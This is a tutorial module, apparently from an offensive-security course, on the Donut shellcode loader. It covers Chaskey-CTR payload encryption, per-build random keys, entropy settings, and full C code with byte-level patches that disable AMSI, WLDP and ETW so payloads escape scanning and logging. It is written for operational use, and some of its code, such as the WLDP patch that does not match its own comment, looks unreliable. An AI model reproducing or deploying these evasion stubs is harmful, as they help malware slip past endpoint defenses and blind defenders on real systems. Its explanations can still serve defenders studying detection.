Difficulty: Intermediate

Module 6: Encryption & Anti-Detection

Chaskey block cipher internals, random key generation, entropy control, and the AMSI/WLDP/ETW bypass stubs built into the Donut loader.

Module Objective

Understand how Donut protects the payload using the Chaskey lightweight block cipher in CTR mode, how random keys and nonces are generated per-shellcode, how entropy levels control the randomization of strings, and exactly how the AMSI, WLDP, and ETW bypass stubs work at the machine code level.

1. The Chaskey Block Cipher

Donut uses the Chaskey cipher, a lightweight block cipher designed by Nicky Mouha for constrained environments. It was chosen for Donut because:

PropertyChaskeyAES-128RC4
Block size128 bits128 bitsStream cipher
Key size128 bits128 bits40-2048 bits
OperationsARX onlySubBytes, ShiftRows, etc.PRGA
Code size (PIC)~200 bytes~2-4 KB (with tables)~100 bytes
MAC supportBuilt-inRequires HMAC wrapperNo

2. Chaskey Internals

Chaskey operates on four 32-bit words (v0, v1, v2, v3) and applies a permutation round function. Donut uses Chaskey-LTS which applies 16 rounds for its MAC:

C// Chaskey permutation round (from encrypt.c)
// Four 32-bit state words, ARX operations only
#define ROUND(v0, v1, v2, v3) \
    v0 += v1; v1 = ROTR32(v1, 27); v1 ^= v0;                       \
    v2 += v3; v3 = ROTR32(v3, 24); v3 ^= v2;                       \
    v2 += v1; v0 = ROTR32(v0, 16) + v3;                             \
    v3 = ROTR32(v3, 19); v3 ^= v0;                                  \
    v1 = ROTR32(v1, 25); v1 ^= v2; v2 = ROTR32(v2, 16);

// Full Chaskey encryption of one 128-bit block
void chaskey_block(DWORD key[4], DWORD data[4]) {
    DWORD v0 = data[0] ^ key[0];
    DWORD v1 = data[1] ^ key[1];
    DWORD v2 = data[2] ^ key[2];
    DWORD v3 = data[3] ^ key[3];

    // 16 rounds of permutation (Chaskey-LTS)
    for (int i = 0; i < 16; i++) {
        ROUND(v0, v1, v2, v3);
    }

    data[0] = v0 ^ key[0];
    data[1] = v1 ^ key[1];
    data[2] = v2 ^ key[2];
    data[3] = v3 ^ key[3];
}

3. CTR Mode Operation

Donut uses Chaskey in Counter (CTR) mode, which turns the block cipher into a stream cipher. This is essential because the payload is not block-aligned:

C// Chaskey-CTR encryption/decryption (same operation)
void chaskey_encrypt(BYTE key[16], BYTE ctr[16], BYTE *data, DWORD len) {
    DWORD blocks = (len + 15) / 16;  // Round up to full blocks
    BYTE  keystream[16];

    for (DWORD i = 0; i < blocks; i++) {
        // Encrypt the counter to produce keystream
        memcpy(keystream, ctr, 16);
        chaskey_block((DWORD*)key, (DWORD*)keystream);

        // XOR keystream with data
        DWORD remaining = (i == blocks - 1) ? (len % 16 ? len % 16 : 16) : 16;
        for (DWORD j = 0; j < remaining; j++) {
            data[i * 16 + j] ^= keystream[j];
        }

        // Increment the counter
        for (int j = 15; j >= 0; j--) {
            if (++ctr[j]) break;  // Increment with carry
        }
    }
}

Why CTR Mode?

CTR mode has several advantages for shellcode: (1) encryption and decryption are the same operation (XOR with keystream), reducing code size; (2) no padding is needed since any length of data can be processed; (3) it is parallelizable, though Donut’s implementation is sequential for simplicity.

4. Dual-Layer Encryption

Donut applies encryption at two levels, each with independent keys:

Encryption Layers

MODULE data
Raw payload + metadata
Encrypt (Key 2)
mod_key + mod_ctr
INSTANCE
Contains Key 2 + hashes
Encrypt (Key 1)
inst key + inst ctr

Layer 1: The DONUT_MODULE is encrypted with mod_key / mod_ctr. These keys are stored inside DONUT_INSTANCE.

Layer 2: The DONUT_INSTANCE itself is encrypted with a separate key/counter pair. The key material for this outer layer is derived from values embedded in the loader code during generation.

An attacker who extracts the loader code but not the instance key cannot decrypt the instance, and without the instance, cannot decrypt the module. This creates a chain of dependencies.

5. Random Key Generation

Every time Donut generates shellcode, all cryptographic material is freshly randomized:

C// During generation (donut.c), keys are randomly generated
// Using the OS CSPRNG for each shellcode generation

// Instance-level keys
if (!CryptGenRandom(prov, CIPHER_KEY_LEN, inst->key))
    return DONUT_ERROR_RANDOM;
if (!CryptGenRandom(prov, CIPHER_BLK_LEN, inst->ctr))
    return DONUT_ERROR_RANDOM;

// Module-level keys (stored inside the instance)
if (!CryptGenRandom(prov, CIPHER_KEY_LEN, inst->mod_key))
    return DONUT_ERROR_RANDOM;
if (!CryptGenRandom(prov, CIPHER_BLK_LEN, inst->mod_ctr))
    return DONUT_ERROR_RANDOM;

This means that generating shellcode from the same payload twice produces completely different output. There is no static key or nonce that defenders can use to create a universal decryption rule.

6. Entropy Levels

Donut provides configurable entropy levels that control how much randomization is applied to strings in the shellcode:

LevelConstantBehavior
NoneDONUT_ENTROPY_NONENo encryption, no random strings. Useful for debugging. Payload is plaintext.
Random NamesDONUT_ENTROPY_RANDOMRandom AppDomain names, random module names, but no encryption
Full (Default)DONUT_ENTROPY_DEFAULTRandom keys, random names, full Chaskey encryption of instance and module

Entropy None = Completely Exposed

Setting entropy to DONUT_ENTROPY_NONE disables all encryption and randomization. The payload sits in plaintext inside the shellcode. This is only useful for development and debugging — never use it in an operational context.

7. AMSI Bypass

The Antimalware Scan Interface (AMSI) is integrated into the .NET CLR, PowerShell, VBScript, and JScript engines. When Assembly::Load is called, the CLR passes the assembly bytes to AmsiScanBuffer. Donut patches this function before loading the payload:

C// bypass.c - AMSI bypass via AmsiScanBuffer patching
// The bypass writes a stub that makes AmsiScanBuffer return AMSI_RESULT_CLEAN

BOOL DisableAMSI(PDONUT_INSTANCE inst) {
    HMODULE amsi = inst->api.LoadLibraryA("amsi.dll");
    if (amsi == NULL) return TRUE;  // AMSI not loaded = nothing to bypass

    // Find AmsiScanBuffer
    FARPROC scan = inst->api.GetProcAddress(amsi, "AmsiScanBuffer");
    if (scan == NULL) return FALSE;

    // Make the function writable
    DWORD old;
    inst->api.VirtualProtect(scan, 8, PAGE_READWRITE, &old);

    // Overwrite the first bytes with a stub
    // x64: returns S_OK (AMSI_RESULT_CLEAN)
    // x86: returns E_INVALIDARG (caller skips the scan)
    #if defined(_WIN64)
        // xor eax, eax ; ret  (return S_OK / AMSI_RESULT_CLEAN)
        BYTE patch[] = { 0x31, 0xC0, 0xC3 };
    #else
        // mov eax, 0x80070057 ; ret 0x18
        BYTE patch[] = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
    #endif

    memcpy(scan, patch, sizeof(patch));

    // Restore original protection
    inst->api.VirtualProtect(scan, 8, old, &old);
    return TRUE;
}

How the AMSI Patch Works

On x64, the patch replaces the first bytes of AmsiScanBuffer with xor eax, eax; ret. This makes the function immediately return S_OK (HRESULT 0), which the CLR interprets as a clean scan result. On x86, it returns E_INVALIDARG which causes the caller to skip the scan. Either way, the assembly bytes are never actually scanned.

8. WLDP Bypass

The Windows Lockdown Policy (WLDP) controls which COM objects and scripts can be instantiated. On systems with Device Guard or WDAC, WLDP can block Donut’s script execution. The bypass patches WldpQueryDynamicCodeTrust and WldpIsClassInApprovedList:

C// WLDP bypass - patch WldpQueryDynamicCodeTrust
BOOL DisableWLDP(PDONUT_INSTANCE inst) {
    HMODULE wldp = inst->api.LoadLibraryA("wldp.dll");
    if (wldp == NULL) return TRUE;  // WLDP not present

    // Patch WldpQueryDynamicCodeTrust to return S_OK
    FARPROC trust = inst->api.GetProcAddress(wldp, "WldpQueryDynamicCodeTrust");
    if (trust) {
        DWORD old;
        inst->api.VirtualProtect(trust, 8, PAGE_READWRITE, &old);
        BYTE patch[] = { 0x31, 0xC0, 0xC3 };  // xor eax, eax; ret
        memcpy(trust, patch, sizeof(patch));
        inst->api.VirtualProtect(trust, 8, old, &old);
    }

    // Patch WldpIsClassInApprovedList to return S_OK + TRUE
    FARPROC approved = inst->api.GetProcAddress(wldp, "WldpIsClassInApprovedList");
    if (approved) {
        DWORD old;
        inst->api.VirtualProtect(approved, 16, PAGE_READWRITE, &old);
        // Set the output BOOL to TRUE and return S_OK
        // This allows all COM CLSIDs to be instantiated
        BYTE patch[] = { 0x31, 0xC0, 0xC3 };
        memcpy(approved, patch, sizeof(patch));
        inst->api.VirtualProtect(approved, 16, old, &old);
    }
    return TRUE;
}

9. ETW Bypass

Event Tracing for Windows (ETW) can log .NET assembly loading events that reveal Donut payloads to defenders. Donut optionally patches EtwEventWrite in ntdll.dll to suppress these events:

C// ETW bypass - patch EtwEventWrite to return immediately
BOOL DisableETW(PDONUT_INSTANCE inst) {
    // ntdll.dll is always loaded
    HMODULE ntdll = inst->api.GetModuleHandleA("ntdll.dll");

    FARPROC etw = inst->api.GetProcAddress(ntdll, "EtwEventWrite");
    if (etw == NULL) return FALSE;

    DWORD old;
    #if defined(_WIN64)
        // x64: single RET instruction (return immediately, no events written)
        inst->api.VirtualProtect(etw, 1, PAGE_EXECUTE_READWRITE, &old);
        BYTE patch[] = { 0xC3 };
        memcpy(etw, patch, sizeof(patch));
        inst->api.VirtualProtect(etw, 1, old, &old);
    #else
        // x86: RET 0x14 (clean up 20 bytes of stack arguments)
        inst->api.VirtualProtect(etw, 4, PAGE_EXECUTE_READWRITE, &old);
        BYTE patch[] = { 0xC2, 0x14, 0x00, 0x00 };
        memcpy(etw, patch, sizeof(patch));
        inst->api.VirtualProtect(etw, 4, old, &old);
    #endif
    return TRUE;
}

Bypass Levels

Donut’s bypass configuration in DONUT_INSTANCE supports three levels: DONUT_BYPASS_NONE (no bypasses, payload may be caught), DONUT_BYPASS_ABORT (attempt bypass; if it fails, abort execution), and DONUT_BYPASS_CONTINUE (attempt bypass; if it fails, continue anyway).

Knowledge Check

1. Why was Chaskey chosen over AES for Donut’s payload encryption?

Chaskey uses only ARX (Add, Rotate, XOR) operations with no S-boxes or lookup tables, making it extremely compact. An AES implementation requires 2-4 KB of code and data for its substitution tables, which is significant overhead in PIC shellcode where every byte matters.

2. What does the AMSI bypass patch do to AmsiScanBuffer on x64?

The patch writes xor eax, eax; ret (3 bytes: 0x31 0xC0 0xC3) at the start of AmsiScanBuffer. This makes the function immediately return 0 (S_OK), which the CLR interprets as a clean scan result. The assembly bytes are never actually examined by the AMSI provider.

3. Why does Donut use two separate encryption layers with independent keys?

The dual-layer design means an attacker must first decrypt the DONUT_INSTANCE (using Key 1 derived from loader code) to obtain Key 2, which is needed to decrypt the DONUT_MODULE containing the actual payload. Neither layer alone reveals the payload.